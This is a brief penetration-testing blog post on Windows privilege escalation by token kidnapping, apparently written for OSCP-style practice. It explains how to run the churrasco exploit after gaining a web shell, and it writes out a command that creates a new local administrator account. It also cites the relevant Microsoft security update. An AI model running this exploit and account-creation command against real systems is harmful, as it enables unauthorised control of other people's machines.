Windows Privelege Escalation via Token Kidnapping

If you have access to a box as nt authority\network service (for example you’ve managed to upload ASP.NET shell) you can easily elevate your privileges on the box.

I’m against uploading binaries to the boxes (but still, it’s my favourite part), but as I know there’s no metasploit module for that so we have no choice. You can download the exploit here and compile by yourself or you can use the one from sqlninja which is located at /usr/share/sqlninja/apps/churrasco.exe. It’s used by sqlninja in cases when we bruteforced sa password.

After uploading you can easily elevate your privileges (I tested it on Windows Server 2003). By entering:

churrasco.bin "net user oscp oscp /add && net localgroup Administrators oscp /add"

you can create admin account successfully.

You can read about this vulnerability on Microsoft website

This security update is rated Important for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008.